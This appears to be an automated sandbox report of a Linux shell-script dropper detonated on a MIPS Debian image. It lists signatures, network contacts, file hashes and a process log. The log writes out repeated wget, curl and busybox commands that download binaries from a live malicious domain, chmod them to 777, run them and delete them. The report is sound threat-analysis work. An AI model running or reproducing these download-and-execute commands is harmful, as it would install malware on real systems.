US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:39

Reported

2024-10-21 01:41

Platform

debian9-mipsbe-20240611-en

Max time kernel

146s

Max time network

148s

Command Line

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c N/A
N/A /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F N/A
N/A /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 N/A
N/A /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt N/A
N/A /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL N/A
N/A /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI N/A
N/A /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH N/A
N/A /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG N/A
N/A /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx N/A
N/A /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB N/A
N/A /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW N/A
N/A /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW N/A
N/A /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst N/A
N/A /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI N/A
N/A /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /usr/bin/curl N/A
File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /usr/bin/curl N/A
File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /usr/bin/curl N/A
File opened for modification /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /usr/bin/curl N/A
File opened for modification /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /usr/bin/curl N/A
File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /usr/bin/curl N/A
File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /usr/bin/curl N/A
File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /usr/bin/curl N/A
File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /usr/bin/curl N/A
File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /usr/bin/curl N/A
File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /usr/bin/curl N/A
File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /usr/bin/curl N/A
File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /usr/bin/curl N/A
File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /usr/bin/curl N/A
File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /usr/bin/curl N/A

Processes

/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh

[/tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/bin/chmod

[chmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c

[./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/bin/rm

[rm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/bin/chmod

[chmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F

[./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/bin/rm

[rm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/bin/chmod

[chmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6

[./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/bin/rm

[rm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/bin/chmod

[chmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt

[./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/bin/rm

[rm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/bin/chmod

[chmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL

[./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/bin/rm

[rm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/bin/chmod

[chmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI

[./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/bin/rm

[rm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/bin/chmod

[chmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH

[./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/bin/rm

[rm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/bin/chmod

[chmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG

[./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/bin/rm

[rm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/bin/chmod

[chmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx

[./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/bin/rm

[rm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/chmod

[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB

[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/rm

[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/bin/chmod

[chmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW

[./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/bin/rm

[rm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/bin/chmod

[chmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW

[./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/bin/rm

[rm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/bin/chmod

[chmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst

[./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/bin/rm

[rm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/bin/chmod

[chmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI

[./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/bin/rm

[rm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/chmod

[chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB

[./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/bin/rm

[rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI

MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7